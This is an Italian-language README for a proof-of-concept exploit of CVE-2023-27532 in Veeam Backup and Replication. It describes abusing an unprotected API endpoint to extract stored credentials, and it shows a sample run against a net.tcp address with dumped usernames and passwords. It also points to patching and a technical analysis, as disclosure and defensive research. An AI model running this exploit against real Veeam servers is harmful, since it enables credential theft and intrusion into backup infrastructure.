
POC per Veeam Backup and Replication CVE-2023-27532
POC per CVE-2023-27532 che colpisce Veeam Backup and Replication
Un'analisi tecnica della causa principale della vulnerabilità è disponibile sul nostro blog: https://www.horizon3.ai/veeam-backup-and-replication-cve-2023-27532-deep-dive
Questo POC sfrutta un endpoint API non protetto per estrarre le credenziali.
/home/dev/RiderProjects/Veeam_CVE-2023-27532/CVE-2023-27532/bin/Debug/net6.0/CVE-2023-27532 net.tcp://192.168.1.139:9401/
UserName = dev Password = Super Secret Password
UserName = root Password =
UserName = root Password =
UserName = root Password =
UserName = root Password =
Aggiorna all'ultima versione o mitiga seguendo le istruzioni nell'avviso di Veeam
Questo software è stato creato esclusivamente per scopi di ricerca accademica e per lo sviluppo di efficaci tecniche difensive, e non è destinato a essere utilizzato per attaccare sistemi se non esplicitamente autorizzati. I manutentori del progetto non sono responsabili dell'uso improprio del software. Usalo in modo responsabile.